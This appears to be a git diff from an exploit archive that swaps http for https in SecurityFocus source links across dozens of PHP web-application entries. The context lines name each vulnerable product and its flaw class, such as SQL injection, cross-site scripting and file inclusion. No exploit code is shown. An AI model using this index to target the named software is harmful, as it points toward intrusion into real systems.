-1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18216/info +source: https://www.securityfocus.com/bid/18216/info Tekno.Portal is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27934.txt b/exploits/php/webapps/27934.txt index 27be5e8fc..a72875389 100644 --- a/exploits/php/webapps/27934.txt +++ b/exploits/php/webapps/27934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18218/info +source: https://www.securityfocus.com/bid/18218/info Abarcar Realty Portal is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27946.txt b/exploits/php/webapps/27946.txt index aebe99183..fdced6a89 100644 --- a/exploits/php/webapps/27946.txt +++ b/exploits/php/webapps/27946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18227/info +source: https://www.securityfocus.com/bid/18227/info Portix-PHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27947.txt b/exploits/php/webapps/27947.txt index 1a70e8e40..eb88b3949 100644 --- a/exploits/php/webapps/27947.txt +++ b/exploits/php/webapps/27947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18230/info +source: https://www.securityfocus.com/bid/18230/info TAL RateMyPic is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27948.txt b/exploits/php/webapps/27948.txt index ee67f8e65..e009ad7c5 100644 --- a/exploits/php/webapps/27948.txt +++ b/exploits/php/webapps/27948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18231/info +source: https://www.securityfocus.com/bid/18231/info SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27949.txt b/exploits/php/webapps/27949.txt index 600219f1f..670961497 100644 --- a/exploits/php/webapps/27949.txt +++ b/exploits/php/webapps/27949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27950.txt b/exploits/php/webapps/27950.txt index fdec4f08c..fcfd24214 100644 --- a/exploits/php/webapps/27950.txt +++ b/exploits/php/webapps/27950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27951.txt b/exploits/php/webapps/27951.txt index fdfb536da..05fd838cf 100644 --- a/exploits/php/webapps/27951.txt +++ b/exploits/php/webapps/27951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27952.txt b/exploits/php/webapps/27952.txt index 79945447f..1a4c0e6f6 100644 --- a/exploits/php/webapps/27952.txt +++ b/exploits/php/webapps/27952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27953.txt b/exploits/php/webapps/27953.txt index d03cf304e..42ea6e3a6 100644 --- a/exploits/php/webapps/27953.txt +++ b/exploits/php/webapps/27953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27954.txt b/exploits/php/webapps/27954.txt index 0bdc24071..3516f28d2 100644 --- a/exploits/php/webapps/27954.txt +++ b/exploits/php/webapps/27954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27955.txt b/exploits/php/webapps/27955.txt index 41bd67bda..aca1c5196 100644 --- a/exploits/php/webapps/27955.txt +++ b/exploits/php/webapps/27955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27956.txt b/exploits/php/webapps/27956.txt index a8b332de0..beb44c664 100644 --- a/exploits/php/webapps/27956.txt +++ b/exploits/php/webapps/27956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18232/info +source: https://www.securityfocus.com/bid/18232/info Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27958.txt b/exploits/php/webapps/27958.txt index b1d66abd4..4aec33683 100644 --- a/exploits/php/webapps/27958.txt +++ b/exploits/php/webapps/27958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18243/info +source: https://www.securityfocus.com/bid/18243/info PHP Pro Publish is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27959.txt b/exploits/php/webapps/27959.txt index cd044d30e..d823d0b0d 100644 --- a/exploits/php/webapps/27959.txt +++ b/exploits/php/webapps/27959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18244/info +source: https://www.securityfocus.com/bid/18244/info PHP ManualMaker is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27961.txt b/exploits/php/webapps/27961.txt index 2d34d91ca..c1259910b 100644 --- a/exploits/php/webapps/27961.txt +++ b/exploits/php/webapps/27961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18255/info +source: https://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27962.txt b/exploits/php/webapps/27962.txt index 1715ee320..d1592b16a 100644 --- a/exploits/php/webapps/27962.txt +++ b/exploits/php/webapps/27962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18256/info +source: https://www.securityfocus.com/bid/18256/info iBWd Guestbook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27963.txt b/exploits/php/webapps/27963.txt index b240c516d..f1205d18a 100644 --- a/exploits/php/webapps/27963.txt +++ b/exploits/php/webapps/27963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18262/info +source: https://www.securityfocus.com/bid/18262/info xueBook is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27964.txt b/exploits/php/webapps/27964.txt index 3b86ea5ca..6bba2094f 100644 --- a/exploits/php/webapps/27964.txt +++ b/exploits/php/webapps/27964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18268/info +source: https://www.securityfocus.com/bid/18268/info CoolForum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27970.txt b/exploits/php/webapps/27970.txt index 573bb8d2a..963aefab5 100644 --- a/exploits/php/webapps/27970.txt +++ b/exploits/php/webapps/27970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18272/info +source: https://www.securityfocus.com/bid/18272/info CyBoards PHP Lite is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/27972.txt b/exploits/php/webapps/27972.txt index b8f98086f..11d07e9e6 100644 --- a/exploits/php/webapps/27972.txt +++ b/exploits/php/webapps/27972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18279/info +source: https://www.securityfocus.com/bid/18279/info ESTsoft InternetDisk is prone to an arbitrary file-upload and script-execution vulnerability. diff --git a/exploits/php/webapps/27973.txt b/exploits/php/webapps/27973.txt index 075a31697..8c4a1ebec 100644 --- a/exploits/php/webapps/27973.txt +++ b/exploits/php/webapps/27973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27974.txt b/exploits/php/webapps/27974.txt index 7b5fec8b8..5ecdeeaa4 100644 --- a/exploits/php/webapps/27974.txt +++ b/exploits/php/webapps/27974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27975.txt b/exploits/php/webapps/27975.txt index 132cc63af..5fa0fa1fa 100644 --- a/exploits/php/webapps/27975.txt +++ b/exploits/php/webapps/27975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27976.txt b/exploits/php/webapps/27976.txt index e396f8460..a3838f304 100644 --- a/exploits/php/webapps/27976.txt +++ b/exploits/php/webapps/27976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18281/info +source: https://www.securityfocus.com/bid/18281/info Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27977.txt b/exploits/php/webapps/27977.txt index f81e6437c..58049f461 100644 --- a/exploits/php/webapps/27977.txt +++ b/exploits/php/webapps/27977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18282/info +source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27978.txt b/exploits/php/webapps/27978.txt index 7e628426c..e21ce3dbd 100644 --- a/exploits/php/webapps/27978.txt +++ b/exploits/php/webapps/27978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18282/info +source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27979.html b/exploits/php/webapps/27979.html index 459a92433..d2fcd6aec 100644 --- a/exploits/php/webapps/27979.html +++ b/exploits/php/webapps/27979.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18287/info +source: https://www.securityfocus.com/bid/18287/info myNewsletter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27980.txt b/exploits/php/webapps/27980.txt index b073bd191..5e3b02751 100644 --- a/exploits/php/webapps/27980.txt +++ b/exploits/php/webapps/27980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18293/info +source: https://www.securityfocus.com/bid/18293/info DownloadEngine is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27982.txt b/exploits/php/webapps/27982.txt index d85d02ab8..df4bd2e5d 100644 --- a/exploits/php/webapps/27982.txt +++ b/exploits/php/webapps/27982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18296/info +source: https://www.securityfocus.com/bid/18296/info GANTTy is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27985.txt b/exploits/php/webapps/27985.txt index 53fe02a2b..94da7ae83 100644 --- a/exploits/php/webapps/27985.txt +++ b/exploits/php/webapps/27985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18306/info +source: https://www.securityfocus.com/bid/18306/info AZ Photo Album Script Pro is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/27988.py b/exploits/php/webapps/27988.py index 0e38942cd..f4af3a8f8 100755 --- a/exploits/php/webapps/27988.py +++ b/exploits/php/webapps/27988.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18313/info +source: https://www.securityfocus.com/bid/18313/info MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27989.txt b/exploits/php/webapps/27989.txt index e8cdc85e3..c1628ea91 100644 --- a/exploits/php/webapps/27989.txt +++ b/exploits/php/webapps/27989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18313/info +source: https://www.securityfocus.com/bid/18313/info MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27990.txt b/exploits/php/webapps/27990.txt index ec8c99635..5d0a6bae7 100644 --- a/exploits/php/webapps/27990.txt +++ b/exploits/php/webapps/27990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18314/info +source: https://www.securityfocus.com/bid/18314/info Calendar Express is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27991.txt b/exploits/php/webapps/27991.txt index f6656e43f..46979c794 100644 --- a/exploits/php/webapps/27991.txt +++ b/exploits/php/webapps/27991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18319/info +source: https://www.securityfocus.com/bid/18319/info PostNuke is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection vulnerabilities, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27994.txt b/exploits/php/webapps/27994.txt index 7710853fe..cab149454 100644 --- a/exploits/php/webapps/27994.txt +++ b/exploits/php/webapps/27994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27995.txt b/exploits/php/webapps/27995.txt index 2fd68db68..67f1e275b 100644 --- a/exploits/php/webapps/27995.txt +++ b/exploits/php/webapps/27995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27996.txt b/exploits/php/webapps/27996.txt index d250dd39e..cea8c037e 100644 --- a/exploits/php/webapps/27996.txt +++ b/exploits/php/webapps/27996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27997.txt b/exploits/php/webapps/27997.txt index 56a3a24eb..776be0712 100644 --- a/exploits/php/webapps/27997.txt +++ b/exploits/php/webapps/27997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27998.txt b/exploits/php/webapps/27998.txt index a040d634e..8f4cf429a 100644 --- a/exploits/php/webapps/27998.txt +++ b/exploits/php/webapps/27998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18348/info +source: https://www.securityfocus.com/bid/18348/info Open Business Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize HTML and script code from user-supplied input to several parameters before returning to the user. diff --git a/exploits/php/webapps/27999.txt b/exploits/php/webapps/27999.txt index 2a7035875..85e7c956b 100644 --- a/exploits/php/webapps/27999.txt +++ b/exploits/php/webapps/27999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18350/info +source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28000.txt b/exploits/php/webapps/28000.txt index 0a1cb1288..48f0056b1 100644 --- a/exploits/php/webapps/28000.txt +++ b/exploits/php/webapps/28000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18350/info +source: https://www.securityfocus.com/bid/18350/info vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28006.txt b/exploits/php/webapps/28006.txt index be294a6c7..98bd6566b 100644 --- a/exploits/php/webapps/28006.txt +++ b/exploits/php/webapps/28006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18383/info +source: https://www.securityfocus.com/bid/18383/info NPDS is prone to multiple input-validation issues, including information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28008.txt b/exploits/php/webapps/28008.txt index 5a8656ca7..0ee2b860c 100644 --- a/exploits/php/webapps/28008.txt +++ b/exploits/php/webapps/28008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18386/info +source: https://www.securityfocus.com/bid/18386/info Adaptive Website Framework is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28009.txt b/exploits/php/webapps/28009.txt index 7ad7a0f8e..5815dbd48 100644 --- a/exploits/php/webapps/28009.txt +++ b/exploits/php/webapps/28009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18390/info +source: https://www.securityfocus.com/bid/18390/info Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28010.txt b/exploits/php/webapps/28010.txt index 54f9c7098..1e34a84c8 100644 --- a/exploits/php/webapps/28010.txt +++ b/exploits/php/webapps/28010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18390/info +source: https://www.securityfocus.com/bid/18390/info Five Star Review Script is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28011.txt b/exploits/php/webapps/28011.txt index 8efa1b31b..e6da069b7 100644 --- a/exploits/php/webapps/28011.txt +++ b/exploits/php/webapps/28011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18391/info +source: https://www.securityfocus.com/bid/18391/info iFoto is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28012.txt b/exploits/php/webapps/28012.txt index 7088ceead..b3d5a3e8c 100644 --- a/exploits/php/webapps/28012.txt +++ b/exploits/php/webapps/28012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18392/info +source: https://www.securityfocus.com/bid/18392/info Foing is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28013.txt b/exploits/php/webapps/28013.txt index bb8f2a37f..9fc10ab9f 100644 --- a/exploits/php/webapps/28013.txt +++ b/exploits/php/webapps/28013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18393/info +source: https://www.securityfocus.com/bid/18393/info SixCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28014.txt b/exploits/php/webapps/28014.txt index 4995047ba..6f2f44390 100644 --- a/exploits/php/webapps/28014.txt +++ b/exploits/php/webapps/28014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18395/info +source: https://www.securityfocus.com/bid/18395/info SixCMS is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28015.txt b/exploits/php/webapps/28015.txt index c68eb4f1e..8517e8294 100644 --- a/exploits/php/webapps/28015.txt +++ b/exploits/php/webapps/28015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18399/info +source: https://www.securityfocus.com/bid/18399/info iFlance is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28016.txt b/exploits/php/webapps/28016.txt index f59c90cd5..5a6d3c97c 100644 --- a/exploits/php/webapps/28016.txt +++ b/exploits/php/webapps/28016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18401/info +source: https://www.securityfocus.com/bid/18401/info DoubleSpeak is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28017.txt b/exploits/php/webapps/28017.txt index 4a63efa8d..cf68ccfc2 100644 --- a/exploits/php/webapps/28017.txt +++ b/exploits/php/webapps/28017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18402/info +source: https://www.securityfocus.com/bid/18402/info CEScripts scripts are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28018.txt b/exploits/php/webapps/28018.txt index a5b7d2043..2162814b6 100644 --- a/exploits/php/webapps/28018.txt +++ b/exploits/php/webapps/28018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18403/info +source: https://www.securityfocus.com/bid/18403/info VBZooM is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28019.txt b/exploits/php/webapps/28019.txt index 0ff835048..7f50bbf07 100644 --- a/exploits/php/webapps/28019.txt +++ b/exploits/php/webapps/28019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18410/info +source: https://www.securityfocus.com/bid/18410/info Simpnews is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28020.txt b/exploits/php/webapps/28020.txt index dee587b9e..a2f56a8df 100644 --- a/exploits/php/webapps/28020.txt +++ b/exploits/php/webapps/28020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18414/info +source: https://www.securityfocus.com/bid/18414/info 35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28021.txt b/exploits/php/webapps/28021.txt index 511097d9e..e2052bf72 100644 --- a/exploits/php/webapps/28021.txt +++ b/exploits/php/webapps/28021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18414/info +source: https://www.securityfocus.com/bid/18414/info 35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28022.txt b/exploits/php/webapps/28022.txt index 912282409..5f9560144 100644 --- a/exploits/php/webapps/28022.txt +++ b/exploits/php/webapps/28022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18423/info +source: https://www.securityfocus.com/bid/18423/info Woltlab Burning Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28023.txt b/exploits/php/webapps/28023.txt index 8e34e4dad..78c67357e 100644 --- a/exploits/php/webapps/28023.txt +++ b/exploits/php/webapps/28023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18426/info +source: https://www.securityfocus.com/bid/18426/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28024.txt b/exploits/php/webapps/28024.txt index 3990ca2f8..b7209a9a5 100644 --- a/exploits/php/webapps/28024.txt +++ b/exploits/php/webapps/28024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18432/info +source: https://www.securityfocus.com/bid/18432/info The bbrss plugin for PhpBB is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28025.txt b/exploits/php/webapps/28025.txt index 86a8b07c8..d06bdb8fa 100644 --- a/exploits/php/webapps/28025.txt +++ b/exploits/php/webapps/28025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18435/info +source: https://www.securityfocus.com/bid/18435/info RahnemaCo is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28027.txt b/exploits/php/webapps/28027.txt index 1f1bb553b..9344f1a1f 100644 --- a/exploits/php/webapps/28027.txt +++ b/exploits/php/webapps/28027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18441/info +source: https://www.securityfocus.com/bid/18441/info ISPConfig is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28028.txt b/exploits/php/webapps/28028.txt index cffa6db73..a6a4eadae 100644 --- a/exploits/php/webapps/28028.txt +++ b/exploits/php/webapps/28028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18444/info +source: https://www.securityfocus.com/bid/18444/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28031.txt b/exploits/php/webapps/28031.txt index 837ea2898..23367f3d8 100644 --- a/exploits/php/webapps/28031.txt +++ b/exploits/php/webapps/28031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18454/info +source: https://www.securityfocus.com/bid/18454/info HotPlug CMS is prone to a cross-site scripting attack. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28032.txt b/exploits/php/webapps/28032.txt index d41200772..3a35f4337 100644 --- a/exploits/php/webapps/28032.txt +++ b/exploits/php/webapps/28032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18470/info +source: https://www.securityfocus.com/bid/18470/info MPCS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28033.txt b/exploits/php/webapps/28033.txt index 6f91f9163..523d6d67a 100644 --- a/exploits/php/webapps/28033.txt +++ b/exploits/php/webapps/28033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18472/info +source: https://www.securityfocus.com/bid/18472/info VBZooM is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28034.txt b/exploits/php/webapps/28034.txt index da6fec28d..3a7f762ed 100644 --- a/exploits/php/webapps/28034.txt +++ b/exploits/php/webapps/28034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18474/info +source: https://www.securityfocus.com/bid/18474/info Ji-takz is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28035.txt b/exploits/php/webapps/28035.txt index e7f6e23b6..ecee1678b 100644 --- a/exploits/php/webapps/28035.txt +++ b/exploits/php/webapps/28035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28036.txt b/exploits/php/webapps/28036.txt index aa773f7d5..a99dd6562 100644 --- a/exploits/php/webapps/28036.txt +++ b/exploits/php/webapps/28036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28037.txt b/exploits/php/webapps/28037.txt index 5329ead24..a483cb678 100644 --- a/exploits/php/webapps/28037.txt +++ b/exploits/php/webapps/28037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28038.txt b/exploits/php/webapps/28038.txt index 7efa3020b..a5f0b3e22 100644 --- a/exploits/php/webapps/28038.txt +++ b/exploits/php/webapps/28038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18477/info +source: https://www.securityfocus.com/bid/18477/info Indexu is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28039.txt b/exploits/php/webapps/28039.txt index 1cc3b4005..fb18ba6d6 100644 --- a/exploits/php/webapps/28039.txt +++ b/exploits/php/webapps/28039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28040.txt b/exploits/php/webapps/28040.txt index f8d77ec66..0637c5799 100644 --- a/exploits/php/webapps/28040.txt +++ b/exploits/php/webapps/28040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include 